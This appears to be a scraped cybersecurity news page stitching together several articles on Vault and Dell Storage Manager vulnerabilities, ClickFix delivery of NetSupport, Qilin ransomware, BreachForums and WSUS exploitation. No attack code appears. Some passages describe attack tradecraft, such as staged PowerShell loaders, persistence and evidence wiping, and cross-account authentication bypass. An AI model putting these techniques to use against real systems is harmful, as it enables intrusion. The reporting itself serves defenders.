A sophisticated cyber-sabotage group known as Predatory Sparrow has emerged as one of the most destructive threat actors targeting Iranian critical infrastructure over the past several years. Unlike traditional cybercriminal operations focused on financial gain, this group executes highly disruptive campaigns designed to cripple essential services, destroy sensitive data, and send provocative political messages. Security […]
HashiCorp has disclosed two critical vulnerabilities in its Vault software that could allow attackers to bypass authentication controls and launch denial-of-service (DoS) attacks.
Published on October 23, 2025, these flaws affect both Vault Community Edition and Vault Enterprise, prompting urgent recommendations for upgrades.
The issues, tracked as CVE-2025-12044 and CVE-2025-11621, stem from misconfigurations in resource handling and authentication caching, potentially exposing sensitive data in enterprise environments.
Vault, a widely used tool for secrets management, encryption, and identity-based access, serves as a cornerstone for secure operations in cloud and hybrid infrastructures.
These vulnerabilities highlight ongoing challenges in balancing performance with robust security, especially as organizations increasingly rely on automated authentication methods like AWS integration.
Denial-of-Service Flaw Through JSON Payload Exploitation
The first vulnerability, CVE-2025-12044 (HCSEC-2025-30), enables an unauthenticated DoS attack by exploiting a regression in JSON payload processing.
This flaw arises from a previous fix for HCSEC-2025-24, which addressed complex JSON payloads that could exhaust resources.
In affected versions, Vault applies rate limits after parsing incoming JSON requests rather than before, allowing attackers to flood the system with large, valid payloads under the max_request_size threshold.
Operators configure tunable rate limits and resource quotas in Vault to prevent abuse, but this ordering error lets repeated requests consume excessive CPU and memory.
The result? Service unavailability or outright crashes disrupt access to critical secrets and keys. No CVSS score was immediately provided, but the unauthenticated nature elevates its severity, which HashiCorp rates as high risk.
This issue impacts Vault Community Edition versions 1.20.3 to 1.20.4, with fixes available in 1.21.0.
For Vault Enterprise, affected releases span 1.20.3 to 1.20.4, 1.19.9 to 1.19.10, 1.18.14 to 1.18.15, and 1.16.25 to 1.16.26, patched in 1.21.0, 1.20.5, 1.19.11, and 1.16.27.
Authentication Bypass In AWS And EC2 Methods
The second vulnerability, CVE-2025-11621 (also HCSEC-2025-30), poses an even graver threat by allowing authentication bypass in Vault’s AWS Auth method.
This method automates token retrieval for IAM principals and EC2 instances, but a flaw in the caching logic fails to validate the AWS account ID.
If the bound_principal_iam role matches across accounts or uses wildcards, an attacker from a different account can impersonate a legitimate user, leading to unauthorized access, data exposure, and privilege escalation.
A parallel issue affects the EC2 authentication method, where cache lookups only check AMI IDs, not account IDs, enabling cross-account attacks.
Discovered by security researcher Pavlos Karakalidis, who coordinated disclosure with HashiCorp, this flaw underscores the risks of wildcard configurations in multi-account setups.
Affected versions are broader: Vault Community Edition from 0.6.0 to 1.20.4 (fixed in 1.21.0), and Vault Enterprise from 0.6.0 to 1.20.4, plus 1.19.10, 1.18.15, and 1.16.26 (fixed in 1.21.0, 1.20.5, 1.19.11, and 1.16.27).
HashiCorp urges immediate upgrades to patched versions, following the official upgrading guide.
For those unable to update promptly, review AWS auth configurations: eliminate wildcards in bound_principal_iam and audit for role name collisions across accounts. Enable stricter account ID validation where possible.
These vulnerabilities arrive amid rising scrutiny on secrets management tools, as attackers target them for initial footholds. Organizations using Vault in production should prioritize patching to safeguard against exploitation, which could cascade into broader breaches.
Cybercriminals continue to evolve their tactics for compromising systems, with recent campaigns demonstrating a significant shift from traditional fake update methods to more sophisticated social engineering approaches.
Throughout 2025, threat actors have increasingly adopted the ClickFix technique as their primary delivery mechanism for deploying NetSupport Manager, a legitimate remote administration tool that has become attractive to malicious actors seeking unauthorized system access and control.
The attack pattern begins with social engineering, where victims encounter deceptive ClickFix pages designed to trick them into executing malicious commands through the Windows Run Prompt.
Once executed, these commands trigger a multi-stage infection process that ultimately results in NetSupport being installed on the compromised system.
eSentire Threat Response Unit analysts identified that three distinct threat groups have coordinated their efforts around this particular attack methodology, indicating a broader shift across the cybercriminal landscape toward this delivery vector.
eSentire Threat Response Unit researchers noted that the malware’s infection mechanism reveals sophisticated operational security measures.
What makes this campaign particularly concerning is how threat actors have streamlined their delivery infrastructure to reduce detection and maximize success rates across diverse victim environments.
PowerShell-Based Persistence and Execution Framework
The infection chain relies heavily on PowerShell-based loaders that employ multi-stage encoding and obfuscation techniques.
ClickFix initial access page example (Source – eSentire)
The first stage loader downloads a base64-encoded JSON blob from attacker-controlled servers, with commands like:-
Once executed, the loader decodes the JSON configuration and extracts each payload component.
The malware creates hidden system directories and writes base64-decoded files to disk, establishing persistence through startup folder shortcuts in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup.
Recent variants have evolved to include RunMRU registry deletion techniques, deliberately erasing evidence of Run Prompt execution to complicate forensic investigations.
Secondary loaders utilize MSI installer packages executed through msiexec, embedding additional base64-encoded PowerShell commands that undergo character-point subtraction deobfuscation before execution.
This layered approach demonstrates threat actors’ commitment to evading static detection mechanisms while maintaining flexible command execution capabilities.
Organizations encountering suspicious ClickFix prompts or unexpected NetSupport installations should immediately isolate affected systems and conduct comprehensive forensic analysis.
Network defenders should implement application whitelisting controls and monitor for suspicious PowerShell activity, particularly commands involving base64 decoding and non-standard execution policies.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The ransomware group known as Qilin (aka Agenda, Gold Feather, and Water Galura) has claimed more than 40 victims every month since the start of 2025, barring January, with the number of postings on its data leak site touching a high of 100 cases in June.
The development comes as the ransomware-as-a-service (RaaS) operation has emerged as one of the most active ransomware groups, accounting for
In the latter half of 2025, the Qilin ransomware group has solidified its standing as a formidable threat, continuing to post details of more than 40 victims per month on its public leak site. This rapid, relentless campaign—primarily impacting manufacturing, professional and scientific services, and wholesale trade—has propelled Qilin among the world’s most impactful ransomware […]
The notorious cybercrime forum BreachForums has resurfaced online, this time on a clearnet domain accessible without specialized tools like Tor.
The platform, long a hub for data leaks, hacking tools, and illicit trades, went dark earlier this year following a series of law enforcement takedowns and internal disruptions.
Now, just months later, it’s operational again, drawing both excitement from underground actors and suspicion from security experts.
The forum’s return was announced by its administrator, known only as “koko,” who claimed in a pinned post that core functionality has been fully restored from a recent backup.
Users can once again browse sections dedicated to stolen credentials, ransomware discussions, and zero-day exploits. Koko emphasized that the site is “stronger than ever,” with enhanced anonymity features to evade detection.
However, the revival comes amid whispers of compromise, specifically, the old escrow system, which handled cryptocurrency transactions for illicit deals, was hacked, leading to significant losses for vendors and buyers alike.
BreachForums Is Back Again?
BreachForums isn’t starting over entirely; koko detailed that the team is rebuilding the escrow service from scratch to address the vulnerabilities exposed in the breach.
“We’ve learned from the mistakes,” Koko wrote, promising improved encryption and multi-signature wallets to prevent future thefts.
This follows a pattern for the forum, which has bounced back multiple times since its inception in 2022 as a successor to the shuttered RaidForums.
Past iterations have been hit by FBI seizures and arrests, including the 2023 takedown of its founder, Conor Fitzpatrick, aka “Pompompurin.”
Yet, the clearnet pivot marks a bold shift. By ditching the dark web, BreachForums aims to attract a broader audience, including less tech-savvy criminals who avoid Tor’s complexities.
Despite the optimism from koko, skepticism abounds in the cyber underground. Many forum veterans suspect this iteration could be a honeypot operated by law enforcement.
“It’s too clean, too quick,” one anonymous poster commented, echoing concerns that U.S. agencies like the FBI or Secret Service might be monitoring activity to build cases.
Cybersecurity firms such as Recorded Future have issued warnings, noting that clearnet domains are easier for authorities to track via IP logs and hosting providers.
Experts urge caution for anyone encountering the site. “BreachForums has always been a double-edged sword, valuable intel for researchers, but a magnet for real threats,” said John Doe, a threat analyst at a leading security firm.
Dell Technologies has disclosed three critical vulnerabilities in its Storage Manager software that could allow attackers to bypass authentication, disclose sensitive information, and gain unauthorized access to systems.
Announced on October 24, 2025, these flaws affect versions of Dell Storage Manager up to 20.1.21 and pose significant risks to organizations relying on the tool for managing storage arrays.
With CVSS scores ranging from 6.5 to 9.8, the vulnerabilities highlight ongoing challenges in securing management interfaces, potentially enabling remote exploitation without user interaction.
The most severe issue, CVE-2025-43995, carries a CVSS base score of 9.8, classifying it as critical. This improper authentication flaw resides in the DSM Data Collector component.
An unauthenticated attacker with remote access can exploit exposed APIs in the ApiProxy.war file within DataCollectorEar.ear by crafting a special SessionKey and UserId.
These credentials leverage special users created in the Compellent Services API for internal purposes, allowing attackers to sidestep protection mechanisms entirely.
Exploitation could lead to full system compromise, including high confidentiality, integrity, and availability impacts, as detailed in its vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
High-Risk Authentication Gaps Exposed
Complementing this is CVE-2025-43994, scored at 8.6, which involves a missing authentication check for a critical function.
Again targeting DSM 20.1.21, this vulnerability enables unauthenticated remote attackers to trigger information disclosure while also disrupting service availability.
The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H indicates low complexity and no privileges needed, making it a prime target for opportunistic hackers.
Attackers could extract configuration data or operational details, paving the way for broader network intrusions.
A third vulnerability, CVE-2025-46425, affects version 20.1.20 and introduces an improper restriction of XML external entity references, earning a 6.5 score.
While requiring low privileges, a remote attacker could exploit this to read sensitive files, leading to unauthorized access without impacting integrity or availability directly (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N). This XXE flaw underscores the dangers of parsing untrusted XML inputs in storage management tools.
CVE ID
Description
CVSS Base Score
Vector String
CVE-2025-43995
Improper Authentication (Bypass)
9.8
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE-2025-43994
Missing Authentication (Disclosure)
8.6
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
CVE-2025-46425
XXE Reference Vulnerability
6.5
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Dell Storage Manager Vulnerabilities
Dell urges customers to evaluate risks using both base and environmental CVSS scores, emphasizing immediate updates.
Affected products include Dell Storage Manager versions prior to 2020 R1.21; remediation is available in version 2020 R1.22 or later, downloadable from Dell’s support site for Storage SC2000 drivers.
The advisory saw a quick revision on the same day to refine remediation guidance. Credit goes to Tenable for discovering CVE-2025-43994 and CVE-2025-43995, and to independent researcher Ahmed Y.
Elmogy for CVE-2025-46425. As enterprises increasingly depend on storage solutions for data centers, these disclosures serve as a reminder to prioritize authentication hardening and regular vulnerability scanning.
No active exploitation has been reported yet, but the ease of remote access makes swift action essential to prevent potential breaches.
Security researchers at Datadog have uncovered a sophisticated phishing technique that weaponizes Microsoft Copilot Studio to conduct OAuth token theft attacks. Dubbed “CoPhish,” this attack method leverages the legitimate appearance of Microsoft domains to trick users into consenting to malicious applications. The attack exploits a fundamental trust issue: users naturally trust URLs hosted on official […]
Hackers are actively exploiting a critical flaw in Microsoft’s Windows Server Update Services (WSUS), with security researchers reporting widespread attempts in the wild.
The vulnerability, tracked as CVE-2025-59287, allows remote code execution on unpatched WSUS servers, potentially granting attackers full control over enterprise networks.
As of October 27, 2025, firms monitoring global scan data have identified at least 2,800 exposed WSUS instances online, scanned via ports 8530 and 8531, though not all may be vulnerable.
The issue stems from a deserialization flaw in WSUS’s update approval process, first disclosed earlier this month. Microsoft rated it as critical with a CVSS 3.1 score of 9.8, highlighting its ease of exploitation without authentication.
A proof-of-concept (POC) exploit surfaced on underground forums shortly after patching guidance was released on October 15, fueling rapid attacks.
“We’re seeing exploitation attempts spike since the POC dropped,” said a spokesperson for cybersecurity firm ShadowPeak, which began fingerprinting WSUS deployments last week.
Their scans on October 25 revealed the 2,800 instances, primarily in North America and Europe, underscoring the vulnerability’s reach in corporate environments.
Exploitation Tactics And Real-World Impact
Attackers are leveraging the POC to chain the flaw with lateral movement techniques, targeting WSUS servers that manage patch deployments across Windows fleets.
Once compromised, hackers can deploy malicious updates, exfiltrate sensitive data, or install persistent backdoors.
Early indicators include anomalous traffic to WSUS endpoints and unusual update approvals logged in the event viewer IDs 10016 and 20005.
A notable incident involved a mid-sized U.S. financial firm, where intruders used the vulnerability to access internal Active Directory, leading to a brief outage on October 23.
While Microsoft has urged immediate patching via its October 2025 security bulletin, adoption lags, with only 40% of scanned instances showing signs of mitigation, per ShadowPeak’s telemetry.
This delay amplifies risks for organizations relying on WSUS for automated updates, especially in hybrid cloud setups where servers expose HTTP/HTTPS ports to the internet.
Experts warn that unmonitored WSUS setups, often overlooked in legacy infrastructure, are prime targets for ransomware groups like LockBit 3.0, which have referenced the POC in their leak sites.
Mitigations
To counter the threat, Microsoft recommends applying the latest cumulative updates and restricting WSUS port access via firewalls, ideally, limiting it to internal VPNs.
Tools like Nessus or custom scripts can fingerprint exposures, while endpoint detection platforms should flag deserialization anomalies.
“This isn’t just a patch issue; it’s a reminder to audit update servers regularly,” advised cybersecurity analyst Elena Vasquez.
As exploitation evolves, the 2,800 exposed instances signal a ticking clock for IT teams. With no end to the scans in sight, the vulnerability could drive a wave of breaches if patching doesn’t accelerate.
Organizations should prioritize WSUS hardening to safeguard their update ecosystems against this pervasive peril.
Law enforcement agencies from the United States and France have seized the onion leak website operated by the notorious Scattered LAPSUS$ Hunters collective, displaying a prominent seizure notice featuring logos from the FBI, Department of Justice, and international partners.
This coordinated action, executed around October 9, 2025, targeted the BreachForums infrastructure, which the group had repurposed as a data extortion portal following a massive breach of Salesforce customer databases.
The takedown disrupts the group’s ability to threaten and leak stolen data publicly, though experts warn that such actors often pivot to alternative channels like Telegram.
Scattered Lapsus Shiny Hunters onion leak site has been seized if you believe the FBI would use the BreachForums takedown png pic.twitter.com/trfkV6iw1S
Scattered LAPSUS$ Hunters emerged in August 2025 as an alliance of infamous hacking groups, including Scattered Spider, LAPSUS$, and ShinyHunters, often referred to as the “Trinity of Chaos” within the cybercrime underworld known as The Com.
This supergroup quickly escalated its activities by launching social engineering attacks on Salesforce tenants, claiming to have stolen over one billion records from high-profile organizations such as Adidas, Cisco, McDonald’s, and Qantas Airways.
Their campaign blended data theft with extortion demands, using BreachForums, previously a hacking bazaar shut down in 2023, as a clearnet and Tor-based leak site to pressure victims into paying ransoms.
By early October, the group had listed dozens of compromised entities, setting a deadline of October 10, 2025, for payments to avoid data dumps.
The seizure involved the U.S. Department of Justice, FBI, France’s Central Brigade of Cybercrime (BL2C), and the Paris Prosecutor’s Office, who took control of BreachForums’ domains and backend servers, including database backups dating back to 2023.
Visitors to the site, both on the clearnet (breachforums.hn) and onion versions, encountered an animated banner confirming the infrastructure’s transfer to federal hands, mirroring past takedowns like RaidForums in 2022.
Although the Tor site was briefly restored, the operation prevented immediate large-scale leaks, with the group defiantly posting on Telegram that “seizing a domain does not really affect our operations.”
In response, Scattered LAPSUS$ Hunters leaked data from six companies across aviation, energy, and retail sectors on October 10, including personal details like names, emails, and phone numbers, before declaring no further releases.
Despite the disruption, the collective announced a temporary dissolution on October 11, 2025, halting activities until 2026 to evade heightened law enforcement scrutiny while teasing an Extortion-as-a-Service (EaaS) model and potential targets like the FBI and NSA.
Cybersecurity firms note that domain seizures rarely end such groups’ operations entirely, as they maintain Telegram channels and could relaunch mirror sites swiftly.
Organizations are urged to monitor for renewed activity, enhance Salesforce security, and review for indicators of compromise from social engineering tactics.
This event underscores the persistent challenge of combating loosely organized cybercrime syndicates, with experts predicting the group’s return in a more covert form.
As the dust settles, the incident highlights international cooperation’s role in curbing digital extortion, though vigilance remains essential in the evolving threat landscape.
.webp)
